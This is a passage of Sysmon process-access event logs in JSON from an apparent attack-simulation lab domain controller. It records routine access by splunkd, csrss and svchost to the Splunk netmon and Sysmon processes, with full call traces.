08:00:41.880","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2129-5F25-0000-0010FE5D0900}","TargetProcessId":"2996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2129-5F25-0000-0010FE5D0900}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2129-5F25-0000-0010FE5D0900}","TargetProcessId":"2996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6054,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
